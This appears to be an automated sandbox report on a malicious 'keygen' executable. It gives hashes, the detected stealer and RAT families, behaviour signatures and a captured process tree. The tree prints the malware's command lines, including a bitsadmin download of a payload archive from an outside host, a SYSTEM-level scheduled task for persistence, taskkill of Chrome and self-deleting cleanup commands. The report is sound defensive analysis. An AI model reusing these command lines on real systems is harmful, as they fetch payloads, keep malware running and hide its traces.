Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1802s
  • max time network
    1461s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    06-05-2021 08:37

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 59 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 37 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 33 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 40 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2796
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2788
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2748
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2556
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2520
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1872
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1400
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1360
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1176
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1100
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1052
                    • C:\Users\Admin\AppData\Roaming\tbrhsfb
                      C:\Users\Admin\AppData\Roaming\tbrhsfb
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4120
                      • C:\Users\Admin\AppData\Roaming\tbrhsfb
                        C:\Users\Admin\AppData\Roaming\tbrhsfb
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:3572
                    • C:\Users\Admin\AppData\Roaming\tbrhsfb
                      C:\Users\Admin\AppData\Roaming\tbrhsfb
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5160
                      • C:\Users\Admin\AppData\Roaming\tbrhsfb
                        C:\Users\Admin\AppData\Roaming\tbrhsfb
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5188
                    • C:\Windows\system32\rundll32.exe
                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll",ASqacOXEm
                      2⤵
                      • Windows security modification
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:4908
                    • C:\Users\Admin\AppData\Roaming\tbrhsfb
                      C:\Users\Admin\AppData\Roaming\tbrhsfb
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4280
                      • C:\Users\Admin\AppData\Roaming\tbrhsfb
                        C:\Users\Admin\AppData\Roaming\tbrhsfb
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5924
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:300
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:996
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2092
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2760
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2756
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2988
                        • C:\Users\Admin\AppData\Local\Temp\is-BS7EE.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-BS7EE.tmp\Install.tmp" /SL5="$4015A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:580
                          • C:\Users\Admin\AppData\Local\Temp\is-BEL6G.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-BEL6G.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3876
                            • C:\Program Files\Mozilla Firefox\JNZMEASCPW\ultramediaburner.exe
                              "C:\Program Files\Mozilla Firefox\JNZMEASCPW\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:2804
                              • C:\Users\Admin\AppData\Local\Temp\is-UA7E4.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-UA7E4.tmp\ultramediaburner.tmp" /SL5="$501E8,281924,62464,C:\Program Files\Mozilla Firefox\JNZMEASCPW\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:3992
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:2540
                            • C:\Users\Admin\AppData\Local\Temp\67-71193-d15-b2992-408f581e23bf7\Waniwaeshyfi.exe
                              "C:\Users\Admin\AppData\Local\Temp\67-71193-d15-b2992-408f581e23bf7\Waniwaeshyfi.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              PID:1192
                            • C:\Users\Admin\AppData\Local\Temp\32-2b864-908-ca695-2b6f952ef67ee\Taerugoshacae.exe
                              "C:\Users\Admin\AppData\Local\Temp\32-2b864-908-ca695-2b6f952ef67ee\Taerugoshacae.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:3880
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dnmkomn4.ucq\KiffMainE1.exe & exit
                                6⤵
                                  PID:4348
                                  • C:\Users\Admin\AppData\Local\Temp\dnmkomn4.ucq\KiffMainE1.exe
                                    C:\Users\Admin\AppData\Local\Temp\dnmkomn4.ucq\KiffMainE1.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:3724
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xsmjz3vm.ahi\001.exe & exit
                                  6⤵
                                    PID:4808
                                    • C:\Users\Admin\AppData\Local\Temp\xsmjz3vm.ahi\001.exe
                                      C:\Users\Admin\AppData\Local\Temp\xsmjz3vm.ahi\001.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:5104
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ira50vrz.lhk\installer.exe /qn CAMPAIGN="654" & exit
                                    6⤵
                                      PID:2940
                                      • C:\Users\Admin\AppData\Local\Temp\ira50vrz.lhk\installer.exe
                                        C:\Users\Admin\AppData\Local\Temp\ira50vrz.lhk\installer.exe /qn CAMPAIGN="654"
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Enumerates connected drives
                                        • Modifies system certificate store
                                        • Suspicious use of FindShellTrayWindow
                                        PID:4252
                                        • C:\Windows\SysWOW64\msiexec.exe
                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ira50vrz.lhk\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ira50vrz.lhk\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620038483 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                          8⤵
                                            PID:5624
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ufxgknj1.sqr\gpooe.exe & exit
                                        6⤵
                                          PID:5016
                                          • C:\Users\Admin\AppData\Local\Temp\ufxgknj1.sqr\gpooe.exe
                                            C:\Users\Admin\AppData\Local\Temp\ufxgknj1.sqr\gpooe.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            PID:5004
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:2060
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                                PID:6060
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:5308
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:5664
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p4ecb5bn.42r\google-game.exe & exit
                                            6⤵
                                              PID:4204
                                              • C:\Users\Admin\AppData\Local\Temp\p4ecb5bn.42r\google-game.exe
                                                C:\Users\Admin\AppData\Local\Temp\p4ecb5bn.42r\google-game.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:2272
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                  8⤵
                                                  • Loads dropped DLL
                                                  • Modifies registry class
                                                  PID:5160
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rg4zz1tf.iws\huesaa.exe & exit
                                              6⤵
                                                PID:5208
                                                • C:\Users\Admin\AppData\Local\Temp\rg4zz1tf.iws\huesaa.exe
                                                  C:\Users\Admin\AppData\Local\Temp\rg4zz1tf.iws\huesaa.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5724
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    8⤵
                                                      PID:6000
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      8⤵
                                                        PID:5244
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:5716
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:1664
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oxerlhep.xhs\askinstall39.exe & exit
                                                    6⤵
                                                      PID:5656
                                                      • C:\Users\Admin\AppData\Local\Temp\oxerlhep.xhs\askinstall39.exe
                                                        C:\Users\Admin\AppData\Local\Temp\oxerlhep.xhs\askinstall39.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5932
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                          8⤵
                                                            PID:4780
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /f /im chrome.exe
                                                              9⤵
                                                              • Kills process with taskkill
                                                              PID:5352
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q1swsrjn.5je\setup.exe & exit
                                                        6⤵
                                                          PID:5876
                                                          • C:\Users\Admin\AppData\Local\Temp\q1swsrjn.5je\setup.exe
                                                            C:\Users\Admin\AppData\Local\Temp\q1swsrjn.5je\setup.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:6100
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\q1swsrjn.5je\setup.exe"
                                                              8⤵
                                                                PID:3732
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping 1.1.1.1 -n 1 -w 3000
                                                                  9⤵
                                                                  • Runs ping.exe
                                                                  PID:6008
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gdm0tlam.xmf\y1.exe & exit
                                                            6⤵
                                                              PID:4784
                                                              • C:\Users\Admin\AppData\Local\Temp\gdm0tlam.xmf\y1.exe
                                                                C:\Users\Admin\AppData\Local\Temp\gdm0tlam.xmf\y1.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                PID:5408
                                                                • C:\Users\Admin\AppData\Local\Temp\7JUNA2VMVs.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\7JUNA2VMVs.exe"
                                                                  8⤵
                                                                    PID:5064
                                                                    • C:\Users\Admin\AppData\Roaming\1620297931768.exe
                                                                      "C:\Users\Admin\AppData\Roaming\1620297931768.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620297931768.txt"
                                                                      9⤵
                                                                      • Executes dropped EXE
                                                                      PID:4244
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\7JUNA2VMVs.exe"
                                                                      9⤵
                                                                        PID:5656
                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                          ping 127.0.0.1 -n 3
                                                                          10⤵
                                                                          • Executes dropped EXE
                                                                          • Runs ping.exe
                                                                          PID:5244
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\gdm0tlam.xmf\y1.exe"
                                                                      8⤵
                                                                        PID:4792
                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                          timeout /T 10 /NOBREAK
                                                                          9⤵
                                                                          • Delays execution with timeout.exe
                                                                          PID:4824
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bft35vzd.dfv\Setup_v3.exe & exit
                                                                    6⤵
                                                                      PID:5696
                                                                      • C:\Users\Admin\AppData\Local\Temp\bft35vzd.dfv\Setup_v3.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\bft35vzd.dfv\Setup_v3.exe
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        PID:6060
                                                                        • C:\Windows\SysWOW64\at.exe
                                                                          "C:\Windows\System32\at.exe"
                                                                          8⤵
                                                                            PID:5544
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                                            8⤵
                                                                              PID:5964
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\System32\cmd.exe
                                                                                9⤵
                                                                                  PID:4848
                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                    findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                                                    10⤵
                                                                                      PID:5000
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                                      Fessura.exe.com Z
                                                                                      10⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1440
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                                                        11⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:4788
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                                          12⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:3844
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                          12⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1084
                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                      ping 127.0.0.1 -n 30
                                                                                      10⤵
                                                                                      • Modifies registry class
                                                                                      • Runs ping.exe
                                                                                      PID:5040
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                                  8⤵
                                                                                    PID:1476
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r1ksqzxb.bq3\toolspab1.exe & exit
                                                                                6⤵
                                                                                  PID:5824
                                                                                  • C:\Users\Admin\AppData\Local\Temp\r1ksqzxb.bq3\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\r1ksqzxb.bq3\toolspab1.exe
                                                                                    7⤵
                                                                                      PID:4812
                                                                                      • C:\Users\Admin\AppData\Local\Temp\r1ksqzxb.bq3\toolspab1.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\r1ksqzxb.bq3\toolspab1.exe
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:5864
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1uqwlwj4.miu\005.exe & exit
                                                                                    6⤵
                                                                                      PID:5152
                                                                                      • C:\Users\Admin\AppData\Local\Temp\1uqwlwj4.miu\005.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\1uqwlwj4.miu\005.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5600
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\szscnecn.ldn\SunLabsPlayer.exe /S & exit
                                                                                      6⤵
                                                                                        PID:5476
                                                                                        • C:\Users\Admin\AppData\Local\Temp\szscnecn.ldn\SunLabsPlayer.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\szscnecn.ldn\SunLabsPlayer.exe /S
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Drops file in Program Files directory
                                                                                          PID:5292
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:5972
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:5640
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:5220
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                                  8⤵
                                                                                                    PID:5296
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                                    8⤵
                                                                                                      PID:5196
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                                      8⤵
                                                                                                        PID:5856
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                        • Checks for any installed AV software in registry
                                                                                                        PID:4140
                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                        8⤵
                                                                                                        • Download via BitsAdmin
                                                                                                        PID:5308
                                                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops file in Program Files directory
                                                                                                        PID:4832
                                                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pTu7FDc7mojSd2jD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4688
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                          PID:6008
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                                          8⤵
